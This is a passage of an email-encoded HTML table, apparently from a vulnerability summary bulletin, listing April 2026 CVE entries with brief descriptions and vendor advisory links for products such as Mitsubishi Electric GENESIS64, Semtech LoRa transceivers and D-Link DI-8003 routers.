secrets</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Mitsubishi Electric Corporation--GENESIS64</td=

<td>Cleartext Storage of Sensitive Information vulnerability in Mitsubishi = Electric GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric ICONICS = Suite versions 10.97.3 and prior, Mitsubishi Electric MobileHMI versions 10= .97.3 and prior, Mitsubishi Electric Hyper Historian versions 10.97.3 and p= rior, Mitsubishi Electric AnalytiX versions 10.97.3 and prior, Mitsubishi E= lectric GENESIS versions 11.02 and prior, Mitsubishi Electric MC Works64 al=
l versions, Mitsubishi Electric Iconics Digital Solutions GENESIS64 version=
s 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS = Suite versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solut= ions MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Iconics Digi= tal Solutions Hyper Historian versions 10.97.3 and prior, Mitsubishi Electr=
ic Iconics Digital Solutions AnalytiX versions 10.97.3 and prior, and Mitsu= bishi Electric Iconics Digital Solutions GENESIS versions 11.02 and prior a= llows a local attacker to disclose the SQL Server credentials stored in pla= intext within the local SQLite file by exploiting this vulnerability, when = the local caching feature using SQLite is enabled and SQL authentication is=
used for the SQL Server authentication. As a result, the unauthorized atta= cker could access the SQL Server and disclose, tamper with, or destroy data=
on the server, potentially cause a denial-of-service (DoS) condition on th=
e system.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14815" target=3D= "_blank" rel=3D"noopener">CVE-2025-14815</a></td>

<a href=3D"https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-= 023_en.pdf" target=3D"_blank" rel=3D"noopener">https://www.mitsubishielectr= ic.com/psirt/vulnerability/pdf/2025-023_en.pdf</a><br><a href=3D"https://jv= n.jp/vu/JVNVU90646130/" target=3D"_blank" rel=3D"noopener">https://jvn.jp/v= u/JVNVU90646130/</a><br><a href=3D"https://www.cisa.gov/news-events/ics-adv= isories/icsa-26-097-01" target=3D"_blank" rel=3D"noopener">https://www.cisa= .gov/news-events/ics-advisories/icsa-26-097-01</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Mitsubishi Electric Corporation--GENESIS64</td=

<td>Cleartext Storage of Sensitive Information in GUI vulnerability in Mits= ubishi Electric GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric I= CONICS Suite versions 10.97.3 and prior, Mitsubishi Electric MobileHMI vers= ions 10.97.3 and prior, Mitsubishi Electric Hyper Historian versions 10.97.=
3 and prior, Mitsubishi Electric AnalytiX versions 10.97.3 and prior, Mitsu= bishi Electric GENESIS versions 11.02 and prior, Mitsubishi Electric MC Wor= ks64 all versions, Mitsubishi Electric Iconics Digital Solutions GENESIS64 = versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions I= CONICS Suite versions 10.97.3 and prior, Mitsubishi Electric Iconics Digita=
l Solutions MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Iconi=
cs Digital Solutions Hyper Historian versions 10.97.3 and prior, Mitsubishi=
Electric Iconics Digital Solutions AnalytiX versions 10.97.3 and prior, an=
d Mitsubishi Electric Iconics Digital Solutions GENESIS versions 11.02 and = prior allows a local attacker to disclose the SQL Server credentials displa= yed in plain text in the GUI of the Hyper Historian Splitter feature by exp= loiting this vulnerability, when SQL authentication is used for the SQL Ser= ver authentication. As a result, the unauthorized attacker could access the=
SQL Server and disclose, tamper with, or destroy data on the server, poten= tially cause a denial-of-service (DoS) condition on the system.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14816" target=3D= "_blank" rel=3D"noopener">CVE-2025-14816</a></td>

<a href=3D"https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-= 023_en.pdf" target=3D"_blank" rel=3D"noopener">https://www.mitsubishielectr= ic.com/psirt/vulnerability/pdf/2025-023_en.pdf</a><br><a href=3D"https://ww= w.cisa.gov/news-events/ics-advisories/icsa-26-097-01" target=3D"_blank" rel= =3D"noopener">https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-0= 1</a><br><a href=3D"https://jvn.jp/vu/JVNVU90646130/" target=3D"_blank" rel= =3D"noopener">https://jvn.jp/vu/JVNVU90646130/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semtech--LR1110</td>
<td>An improper access control vulnerability exists in Semtech LoRa LR11xxx=
transceivers running early versions of firmware where the memory write com= mand accessible via the physical SPI interface fails to enforce write prote= ction on the program call stack. An attacker with physical access to the SP=
I interface can overwrite stack memory to hijack program control flow and a= chieve limited arbitrary code execution. However, the impact is limited to = the active attack session: the device's secure boot mechanism prevents pers= istent firmware modification, the crypto engine isolates cryptographic keys=
from direct firmware access, and all modifications are lost upon device re= boot or loss of physical access.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14857" target=3D= "_blank" rel=3D"noopener">CVE-2025-14857</a></td>

<a href=3D"https://www.semtech.com/company/security/security-bulletins/sem-= psa-2026-001" target=3D"_blank" rel=3D"noopener">https://www.semtech.com/co= mpany/security/security-bulletins/sem-psa-2026-001</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semtech--LR1110</td>
<td>The Semtech LR11xx LoRa transceivers running early versions of firmware=
contains an information disclosure vulnerability in its firmware validatio=
n functionality. When a host issues a firmware validity check command via t=
he SPI interface, the device decrypts the provided encrypted firmware packa=
ge block-by-block to validate its integrity. However, the last decrypted fi= rmware block remains uncleared in memory after the validation process compl= etes. An attacker with access to the SPI interface can subsequently issue m= emory read commands to retrieve the decrypted firmware contents from this r= esidual memory, effectively bypassing the firmware encryption protection me= chanism. The attack requires physical access to the device's SPI interface.= </td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14858" target=3D= "_blank" rel=3D"noopener">CVE-2025-14858</a></td>

<a href=3D"https://www.semtech.com/company/security/security-bulletins/sem-= psa-2026-001" target=3D"_blank" rel=3D"noopener">https://www.semtech.com/co= mpany/security/security-bulletins/sem-psa-2026-001</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semtech--LR1110</td>
<td>The Semtech LR11xx LoRa transceivers implement secure boot functionalit=
y using digital signatures to authenticate firmware. However, the implement= ation uses a non-standard cryptographic hashing algorithm that is vulnerabl=
e to second preimage attacks. An attacker with physical access to the devic=
e can exploit this weakness to generate a malicious firmware image with a h= ash collision, bypassing the secure boot verification mechanism and install= ing arbitrary unauthorized firmware on the device.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14859" target=3D= "_blank" rel=3D"noopener">CVE-2025-14859</a></td>

<a href=3D"https://www.semtech.com/company/security/security-bulletins/sem-= psa-2026-001" target=3D"_blank" rel=3D"noopener">https://www.semtech.com/co= mpany/security/security-bulletins/sem-psa-2026-001</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Canonical--Ubuntu</td>
<td>In Ubuntu, ubuntu-desktop-provision version 24.04.4 could leak sensitiv=
e user credentials during crash reporting. Upon installation failure, if a = user submitted a bug report to Launchpad, ubuntu-desktop-provision could in= clude the user's password hash in the attached logs.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-15480" target=3D= "_blank" rel=3D"noopener">CVE-2025-15480</a></td>

<a href=3D"https://github.com/canonical/ubuntu-desktop-provision/pull/1400"=
target=3D"_blank" rel=3D"noopener">feat: don't log identity data (noble ba= ckport)</a><br><a href=3D"https://github.com/canonical/ubuntu-desktop-provi= sion/pull/1399" target=3D"_blank" rel=3D"noopener">feat: don't log identity=
data</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Unknown--Popup Box</td>
<td>The Popup Box WordPress plugin before 5.5.0 does not properly validate = nonces in the add_or_edit_popupbox() function before saving popup data, all= owing unauthenticated attackers to perform Cross-Site Request Forgery attac= ks. When an authenticated admin visits a malicious page, the attacker can c= reate or modify popups with arbitrary JavaScript that executes in the admin=
panel and frontend.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-15611" target=3D= "_blank" rel=3D"noopener">CVE-2025-15611</a></td>

<a href=3D"https://wpscan.com/vulnerability/089ea763-2421-4089-a220-251421f= 7f226/" target=3D"_blank" rel=3D"noopener">https://wpscan.com/vulnerability= /089ea763-2421-4089-a220-251421f7f226/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Ping Identity--PingIDM</td>
<td>An insufficient granularity of access control vulnerability exists in P= ingIDM (formerly ForgeRock Identity Management) where administrators cannot=
properly configure access rules for Remote Connector Servers (RCS) running=
in client mode. This means attackers can spoof a client-mode RCS (if one e= xists) to intercept and/or modify an identity's security-relevant propertie=
s, such as passwords and account recovery information. This issue is exploi= table only when an RCS is configured to run in client mode.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-20628" target=3D= "_blank" rel=3D"noopener">CVE-2025-20628</a></td>

<a href=3D"https://backstage.forgerock.com/knowledge/advisories/article/a14= 305629?rev=3D_newest" target=3D"_blank" rel=3D"noopener">https://backstage.= forgerock.com/knowledge/advisories/article/a14305629?rev=3D_newest</a><br><=
a href=3D"https://backstage.pingidentity.com/downloads/browse/idm/featured"=
target=3D"_blank" rel=3D"noopener">https://backstage.pingidentity.com/down= loads/browse/idm/featured</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Nokia--MantaRay NM</td>
<td>Nokia MantaRay NM is vulnerable to an OS command injection vulnerabilit=
y due to improper neutralization of special elements used in an OS command =
in Symptom Collector application.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-24817" target=3D= "_blank" rel=3D"noopener">CVE-2025-24817</a></td>

<a href=3D"https://www.nokia.com/we-are-nokia/security/product-security-adv= isory/cve-2025-24817/" target=3D"_blank" rel=3D"noopener">https://www.nokia= .com/we-are-nokia/security/product-security-advisory/cve-2025-24817/</a><br= >=C2=A0</td>
</tr>

<td class=3D"vendor-product">Nokia--MantaRay NM</td>
<td>Nokia MantaRay NM is vulnerable to an OS command injection vulnerabilit=
y due to improper neutralization of special elements used in an OS command =
in Log Search application.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-24818" target=3D= "_blank" rel=3D"noopener">CVE-2025-24818</a></td>

<a href=3D"https://www.nokia.com/we-are-nokia/security/product-security-adv= isory/cve-2025-24818/" target=3D"_blank" rel=3D"noopener">https://www.nokia= .com/we-are-nokia/security/product-security-advisory/cve-2025-24818/</a><br= >=C2=A0</td>
</tr>

<td class=3D"vendor-product">Nokia--MantaRay NM</td>
<td>Nokia MantaRay NM is vulnerable to a Relative Path Traversal vulnerabil= ity due to improper validation of input parameter on the file system in Sof= tware Manager application.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-24819" target=3D= "_blank" rel=3D"noopener">CVE-2025-24819</a></td>

<a href=3D"https://www.nokia.com/we-are-nokia/security/product-security-adv= isory/cve-2025-24819/" target=3D"_blank" rel=3D"noopener">https://www.nokia= .com/we-are-nokia/security/product-security-advisory/cve-2025-24819/</a><br= >=C2=A0</td>
</tr>

<td class=3D"vendor-product">Checkmk GmbH--Checkmk</td>
<td>Local privilege escalation in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before=
2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2= .5.0b3 allows a site user to escalate their privileges to root, by manipula= ting files in the site context that are processed when the `omd` administra= tive command is run by root.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-39666" target=3D= "_blank" rel=3D"noopener">CVE-2025-39666</a></td>

<a href=3D"https://checkmk.com/werk/18891" target=3D"_blank" rel=3D"noopene= r">https://checkmk.com/werk/18891</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--OwnTone - open source (audio) media serve= r=C2=A0</td>
<td>owntone-server 2ca10d9 is vulnerable to Buffer Overflow due to lack of = recursive checking.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-44560" target=3D= "_blank" rel=3D"noopener">CVE-2025-44560</a></td>

<a href=3D"https://github.com/owntone/owntone-server/issues/1873" target=3D= "_blank" rel=3D"noopener">https://github.com/owntone/owntone-server/issues/= 1873</a><br><a href=3D"https://gist.github.com/wenwenyuyu/517851c3fe38c4f97= b2d1940597da2d3" target=3D"_blank" rel=3D"noopener">https://gist.github.com= /wenwenyuyu/517851c3fe38c4f97b2d1940597da2d3</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8300</td>
<td>D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow = via the ip parameter in the ip_position_asp function. This vulnerability al= lows attackers to cause a Denial of Service (DoS) via a crafted input.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-45057" target=3D= "_blank" rel=3D"noopener">CVE-2025-45057</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=3DDI-8300" targ= et=3D"_blank" rel=3D"noopener">https://www.dlink.com.cn/techsupport/Product= Info.aspx?m=3DDI-8300</a><br><a href=3D"https://github.com/xiaotea/iot-vuln= erability-collection/blob/main/README.md" target=3D"_blank" rel=3D"noopener= ">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.= md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8300</td>
<td>D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow = via the fx parameter in the jingx_asp function. This vulnerability allows a= ttackers to cause a Denial of Service (DoS) via a crafted input.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-45058" target=3D= "_blank" rel=3D"noopener">CVE-2025-45058</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=3DDI-8300" targ= et=3D"_blank" rel=3D"noopener">https://www.dlink.com.cn/techsupport/Product= Info.aspx?m=3DDI-8300</a><br><a href=3D"https://github.com/xiaotea/iot-vuln= erability-collection/blob/main/README.md" target=3D"_blank" rel=3D"noopener= ">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.= md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8300</td>
<td>D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow = via the fn parameter in the tgfile_htm function. This vulnerability allows = attackers to cause a Denial of Service (DoS) via a crafted input.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-45059" target=3D= "_blank" rel=3D"noopener">CVE-2025-45059</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=3DDI-8300" targ= et=3D"_blank" rel=3D"noopener">https://www.dlink.com.cn/techsupport/Product= Info.aspx?m=3DDI-8300</a><br><a href=3D"https://github.com/xiaotea/iot-vuln= erability-collection/blob/main/README.md" target=3D"_blank" rel=3D"noopener= ">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.= md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">www[.]rrweb[.]io/ -- rrwebplayer</td>
<td>A cross-site scripting (XSS) vulnerability in rrweb-snapshot before v2.= 0.0-alpha.18 allows attackers to execute arbitrary web scripts or HTML via =
a crafted payload.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-45806" target=3D= "_blank" rel=3D"noopener">CVE-2025-45806</a></td>

<a href=3D"https://github.com/rrweb-io/rrweb" target=3D"_blank" rel=3D"noop= ener">https://github.com/rrweb-io/rrweb</a><br><a href=3D"https://github.co= m/rrweb-io/rrweb/tree/master/packages/rrweb-snapshot" target=3D"_blank" rel= =3D"noopener">https://github.com/rrweb-io/rrweb/tree/master/packages/rrweb-= snapshot</a><br><a href=3D"https://github.com/rrweb-io/rrweb/issues/1817" t= arget=3D"_blank" rel=3D"noopener">https://github.com/rrweb-io/rrweb/issues/= 1817</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Google--Android</td>
<td>In importWrappedKey of KMKeymasterApplet.java, there is a possible way = access keys that should be restricted due to improper input validation. Thi=
s could lead to local information disclosure with no additional execution p= rivileges needed. User interaction is not needed for exploitation.</td> <td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-48651" target=3D= "_blank" rel=3D"noopener">CVE-2025-48651</a></td>

<a href=3D"https://source.android.com/docs/security/bulletin/2026/2026-04-0=
1" target=3D"_blank" rel=3D"noopener">https://source.android.com/docs/secur= ity/bulletin/2026/2026-04-01</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>Jizhicms v2.5.4 is vulnerable to Server-Side Request Forgery (SSRF) in = User Evaluation, Message, and Comment modules.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50228" target=3D= "_blank" rel=3D"noopener">CVE-2025-50228</a></td>

<a href=3D"https://github.com/Cherry-toto/jizhicms" target=3D"_blank" rel= =3D"noopener">https://github.com/Cherry-toto/jizhicms</a><br><a href=3D"htt= ps://www.jizhicms.cn" target=3D"_blank" rel=3D"noopener">https://www.jizhic= ms.cn</a><br><a href=3D"https://github.com/Cherry-toto/jizhicms/issues/104"=
target=3D"_blank" rel=3D"noopener">https://github.com/Cherry-toto/jizhicms= /issues/104</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper validation of user input in the qj.asp endpoint.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50644" target=3D= "_blank" rel=3D"noopener">CVE-2025-50644</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A vulnerability has been discovered in D-Link DI-8003 16.07.26A1, which=
can lead to a buffer overflow when the s parameter in the pppoe_list_opt.a=
sp endpoint is manipulated. By sending a crafted request with an excessivel=
y large value for the s parameter, an attacker can trigger a buffer overflo=
w condition.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50645" target=3D= "_blank" rel=3D"noopener">CVE-2025-50645</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product"><span style=3D"font-family: 'Aptos',sans-serif=
; font-size: 12.0pt; line-height: 115%;">D-Link[.]com -- D-Link DI-8003</sp= an></td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to insufficient input validation on the name parameter in the /qos_type_as= p.asp endpoint.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50646" target=3D= "_blank" rel=3D"noopener">CVE-2025-50646</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1, sp= ecifically in the handling of the wans parameter in the qos.asp endpoint.</=

<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50647" target=3D= "_blank" rel=3D"noopener">CVE-2025-50647</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to inadequate input validation in the /tggl.asp endpoint.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50648" target=3D= "_blank" rel=3D"noopener">CVE-2025-50648</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper input validation in the vlan_name parameter in the /shut_set.a=
sp endpoint.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50649" target=3D= "_blank" rel=3D"noopener">CVE-2025-50649</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to inadequate validation of input size in the routes_static parameter in t=
he /router.asp endpoint.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50650" target=3D= "_blank" rel=3D"noopener">CVE-2025-50650</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>An issue in D-Link DI-8003 16.07.26A1 related to improper handling of t=
he id parameter in the /saveparm_usb.asp endpoint.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50652" target=3D= "_blank" rel=3D"noopener">CVE-2025-50652</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of the name and mem parameters in the /time_group.asp=
endpoint.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50653" target=3D= "_blank" rel=3D"noopener">CVE-2025-50653</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper validation of the id parameter in the /thd_member.asp endpoint= .</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50654" target=3D= "_blank" rel=3D"noopener">CVE-2025-50654</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of the name parameter in the /thd_group.asp endpoint.= </td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50655" target=3D= "_blank" rel=3D"noopener">CVE-2025-50655</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of the pid parameter in the /trace.asp endpoint.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50657" target=3D= "_blank" rel=3D"noopener">CVE-2025-50657</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of the custom_error parameter in the /user.asp endpoi= nt.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50659" target=3D= "_blank" rel=3D"noopener">CVE-2025-50659</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of the name parameter in the /url_member.asp endpoint= .</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50660" target=3D= "_blank" rel=3D"noopener">CVE-2025-50660</a></td>

